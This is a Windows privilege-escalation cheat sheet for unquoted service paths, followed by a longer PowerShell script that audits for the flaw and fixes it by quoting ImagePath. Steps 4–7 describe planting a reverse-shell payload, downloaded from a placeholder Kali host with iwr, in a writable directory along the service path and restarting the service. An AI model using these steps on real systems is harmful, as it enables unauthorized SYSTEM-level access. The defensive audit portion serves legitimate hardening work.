Unquoted Service Paths

1. Get a list of services whose executable path is unquoted (the candidates for an unquoted service path attack)

NOTE: The following command only runs in the Command Prompt (cmd.exe)

wmic service get name, pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

NOTE: The following command requires PowerUp.ps1 to be imported first

Get-UnquotedService

2. Check whether the current user can start and stop the service

Start-Service <Service Name>
Stop-Service <Service Name>

3. Check the current user's permissions on each directory along the service path

icacls "<Path>"

EXAMPLE:

icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

4. Craft a payload that returns a reverse shell

5. Download the payload onto the target machine

iwr -uri http://<Kali IP Address>/<Unquoted Path Name>.exe -Outfile <Unquoted Path Name>.exe

6. Place the payload in the unquoted path

copy <Payload> '<Unquoted Path Name>'

EXAMPLE:

copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'

7. Restart the service

Stop-Service <Service Name>
Start-Service <Service Name>
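The following script is an added example; it is not code from the original page and not PowerUp's Get-UnquotedService. It does the enumeration of step 1 and the directory permission check of step 3 in one pass, from the defender's side: for every service with an unquoted, space-containing executable path it lists the parent directories the service control manager would probe, reports which of them grant low-privileged groups file-creation rights, and (with -Fix) closes the gap by quoting the executable portion of the service's ImagePath. Assumptions: Windows PowerShell 5.1 or PowerShell 7 on Windows; the function names and the list of low-privilege principals are this example's own choices.

```powershell
# Added audit/remediation example; not from the original page and not PowerUp's code.
# Enumeration and ACL checks work as a standard user; -Fix rewrites ImagePath and needs an
# elevated shell. The quoted path takes effect the next time the service is restarted.

# Groups whose write access on a parent directory lets any local user plant a file there
# (an assumed list; extend it for your environment)
$script:LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                              'Everyone', 'NT AUTHORITY\INTERACTIVE')

function Get-UnquotedServicePath {
    # Same filter as the wmic/findstr one-liner, via CIM (wmic is deprecated on recent builds):
    # unquoted ImagePath, outside the Windows directory, with a space inside the executable path.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path -match '^"' -or $path -match '^[A-Za-z]:\\Windows\\') { return }
        # Split the executable from its arguments; assumes the executable name ends in ".exe"
        $exe = $path; $arguments = ''
        if ($path -match '^(?<exe>.+?\.exe)(?<rest>.*)$') { $exe = $Matches.exe; $arguments = $Matches.rest.Trim() }
        if ($exe -notmatch ' ') { return }   # spaces only in the arguments are harmless
        [pscustomobject]@{ Name = $_.Name; RunsAs = $_.StartName; PathName = $path; Exe = $exe; Arguments = $arguments }
    }
}

function Get-SearchCandidate {
    param([Parameter(Mandatory)][string]$Exe)
    # The service control manager resolves an unquoted path by trying each space-delimited
    # prefix with ".exe" appended (C:\Program.exe, then C:\Program Files\Enterprise.exe, ...)
    # before the full path. The parent directory of each candidate is where the ACL matters.
    foreach ($m in [regex]::Matches($Exe, ' ')) {
        $candidate = $Exe.Substring(0, $m.Index) + '.exe'
        [pscustomobject]@{ Candidate = $candidate; Directory = (Split-Path -Parent $candidate) }
    }
}

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Directory)
    # True when a low-privilege group holds an Allow ACE carrying the CreateFiles bit; the
    # Write, Modify and FullControl rights all include it. Deny ACEs are not evaluated, so a
    # hit here still deserves a manual icacls look before you call it exploitable.
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($script:LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $createFiles) -ne 0) { return $true }
    }
    return $false
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][string]$Exe,
          [string]$Arguments = '')
    # The fix: quote the executable portion of ImagePath, leaving any arguments outside the quotes.
    $fixed = '"' + $Exe + '"'
    if ($Arguments) { $fixed += ' ' + $Arguments }
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    if ($PSCmdlet.ShouldProcess($Name, "Set ImagePath to $fixed")) {
        Set-ItemProperty -LiteralPath $key -Name ImagePath -Value $fixed -Type ExpandString
    }
    return $fixed
}

function Invoke-UnquotedServicePathAudit {
    [CmdletBinding(SupportsShouldProcess)]
    param([switch]$Fix)
    foreach ($svc in Get-UnquotedServicePath) {
        $writable = @(Get-SearchCandidate -Exe $svc.Exe |
                      Where-Object { Test-LowPrivWritable -Directory $_.Directory })
        $fixed = $null
        if ($Fix) { $fixed = Repair-UnquotedServicePath -Name $svc.Name -Exe $svc.Exe -Arguments $svc.Arguments }
        [pscustomobject]@{
            Name         = $svc.Name
            RunsAs       = $svc.RunsAs
            PathName     = $svc.PathName
            WritableDirs = (($writable | ForEach-Object Directory) -join '; ')
            AtRisk       = ($writable.Count -gt 0)
            FixedPath    = $fixed
        }
    }
}

# Report only (works as a standard user). Add -Fix from an elevated shell to quote the
# paths, or -Fix -WhatIf to preview the registry writes without making them.
Invoke-UnquotedServicePathAudit | Format-Table -AutoSize
```

A service listed with AtRisk = True and RunsAs = LocalSystem is the combination the procedure above relies on; the same report with AtRisk = False means the path is sloppy but the directories are not writable by ordinary users. After running with -Fix, confirm with `sc.exe qc <Service Name>` that BINARY_PATH_NAME is now quoted, then restart the service as in step 7 so the new path is picked up.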
